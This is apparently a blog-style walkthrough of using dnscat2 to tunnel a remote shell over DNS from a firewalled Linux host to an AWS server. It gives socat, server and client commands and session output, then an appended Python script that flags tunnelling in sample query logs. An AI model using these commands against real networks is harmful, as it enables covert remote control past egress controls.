Introduction
Wanted to test DNS tunneling and came across dnscat2.
Got a copy from https://github.com/iagox86/dnscat2
Tried it out and it worked.
My setup was a dnscat2 Linux client behind a firewall connecting outbound to a dnscat2 server in AWS. socat redirects UDP packets from port 53 to 5333. The dnscat2 server requests a shell on the client and receives an interactive shell.
Will certainly be using this again.
Update – more details
Start socat
Redirect UDP port 53 to port 5333 with socat:
attacker$ sudo socat UDP4-RECVFROM:53,fork UDP4-SENDTO:localhost:5333
Install dnscat2 and run it as a non-root user
No domain name is specified, so in this mode dnscat2 requires clients to query our server directly:
attacker$ ruby ./dnscat2.rb --dnsport=5333 --secret=mysecret
Build and run the dnscat2 client on Linux:
victim$ ./dnscat --dns=server=54.191.x.x --secret=mysecret
On the server side you should see the new session established:
New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)

dnscat2> sessions
0 :: main [active]
  crypto-debug :: Debug window for crypto stuff [*]
  dns1 :: DNS Driver running on 0.0.0.0:5333 domains = [*]
  1 :: command (kali) [encrypted and verified] [*] [idle for 19 seconds]
Then, to start an interactive OS shell, attach to the initial session 1 and issue the shell command:
dnscat2> session -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a command session!

That means you can enter a dnscat2 command such as 'ping'! For a full list of clients, try 'help'.
Run the shell command:
command (kali) 1> shell
Sent request to execute a shell
command (kali) 1> New window created: 2
Shell session created!
Connect to the new session 2:
command (kali) 1> session -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!

That means that anything you type will be sent as-is to the client, and anything they type will be displayed as-is on the screen! If the client is executing a command and you don't see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.
Now you can issue shell commands:
sh (kali) 2> id
sh (kali) 2> uid=1000(bob) gid=1001(bob) groups=1001(bob)
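The setup above has the client send DNS straight to the server's IP on port 53 instead of through the network's resolver, and dnscat2 carries its data in hostname labels and in record types such as TXT, CNAME and MX. As an added example (not part of the original post or of dnscat2), the script below scores constructed query-log lines on those indicators; the log format, the internal resolver 10.0.0.2, the placeholder server 203.0.113.10 and the hex-encoded labels are all assumptions for the sample.

```python
# Constructed sample log, not real traffic. Fields: src dst dport qname qtype.
# 10.0.0.2 is the assumed sanctioned internal resolver; 203.0.113.10 is a
# placeholder for an external server queried directly, as in the setup above.
SAMPLE_LOG = """
10.0.0.5 10.0.0.2 53 www.example.com A
10.0.0.5 10.0.0.2 53 mail.example.com MX
10.0.0.7 203.0.113.10 53 7a1b3f9c2d4e6f8a0b1c2d3e4f5a6b7c.8d9e0f1a2b3c4d5e6f.tunnel TXT
10.0.0.7 203.0.113.10 53 0d2f4a6c8e0b1d3f5a7c9e1b3d5f7a9c.b2d4f6a8c0e2f4a6b8.tunnel CNAME
10.0.0.7 203.0.113.10 53 9e8d7c6b5a4f3e2d1c0b9a8f7e6d5c4b.3a2b1c0d9e8f7a6b5c.tunnel MX
10.0.0.9 10.0.0.2 53 cdn.static.example.net A
"""
APPROVED_RESOLVERS = {"10.0.0.2"}
HEX_DIGITS = set("0123456789abcdef")
DATA_QTYPES = {"TXT", "CNAME", "MX"}  # record types a tunnel can fill with free-form data

def score_query(src, dst, dport, qname, qtype, approved=APPROVED_RESOLVERS):
    """Return (score, reasons): one point per tunnelling indicator present."""
    reasons = []
    if dport == 53 and dst not in approved:
        reasons.append("DNS sent directly to %s, bypassing approved resolvers" % dst)
    labels = qname.lower().rstrip(".").split(".")
    payload = "".join(labels[:-1])  # leftmost labels are where tunnels put data
    if max(len(label) for label in labels) >= 30:
        reasons.append("label of 30+ characters")
    if len(payload) >= 20 and sum(c in HEX_DIGITS for c in payload) / len(payload) >= 0.9:
        reasons.append("labels are almost entirely hex digits")
    if qtype in DATA_QTYPES:
        reasons.append("record type %s carries free-form data" % qtype)
    return len(reasons), reasons

def parse_log(log_text):
    """Yield (src, dst, dport, qname, qtype) tuples from whitespace-separated lines."""
    for line in log_text.splitlines():
        if line.strip():
            src, dst, dport, qname, qtype = line.split()
            yield src, dst, int(dport), qname, qtype

def flag_tunneling(log_text, approved=APPROVED_RESOLVERS, threshold=3):
    """Group queries scoring at or above threshold by source host."""
    flagged = {}
    for src, dst, dport, qname, qtype in parse_log(log_text):
        score, reasons = score_query(src, dst, dport, qname, qtype, approved)
        if score >= threshold:
            flagged.setdefault(src, []).append((qname, score, reasons))
    return flagged

def direct_dns_sources(log_text, approved=APPROVED_RESOLVERS):
    """(src, dst) pairs sending port-53 traffic anywhere but the approved resolvers."""
    return {(s, d) for s, d, p, _, _ in parse_log(log_text) if p == 53 and d not in approved}
```

A single indicator (an MX lookup to the internal resolver, say) scores 1 and is ignored; the direct-to-server queries with long hex labels and data-carrying record types score 4, so only 10.0.0.7 is flagged, and direct_dns_sources lists the egress the firewall should have blocked in the first place.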